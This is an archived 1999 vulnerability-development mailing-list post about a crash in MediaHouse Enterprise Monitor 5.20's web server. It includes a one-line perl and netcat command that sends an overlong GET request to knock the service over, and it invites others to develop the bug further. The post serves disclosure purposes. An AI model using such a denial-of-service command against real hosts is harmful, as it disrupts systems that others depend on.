Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: MediaHouse Enterprise Monitor 5.20

MediaHouse Enterprise Monitor 5.20

From: Sebastian Andersson <bofh-exploitdev_at_DIEGEEKDIE.COM>
Date: Thu, 21 Oct 1999 15:05:42 +0200

        Hiya

"MediaHouse Enterprise Monitor 5.20" (<http://www.mediahouse.com/>) is
a network monitoring program with its own fucked up webserver running
on NT. I crashed it within 2 minutes after I got the url:

perl -e 'print "GET /" . "x"x9999 . "\r\n\r\n"' | nc host 8080

This program has a feature there it is able to reboot other NT machines
and for this to work, you have to store the domain admin name and
password in it. It also monitors stuff like radius servers there it need
usernames/passwords.

I don't know if this can be used for more than stupid DOS attacks and
I know too little about NT to explore this further.
Maybe someone else would like to give it a try?

There is a 30 day trial version to download from their website.

It seems like a rather nice network monitoring program if you put it on
a secure network.

/Sebastian
Received on Oct 24 1999

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos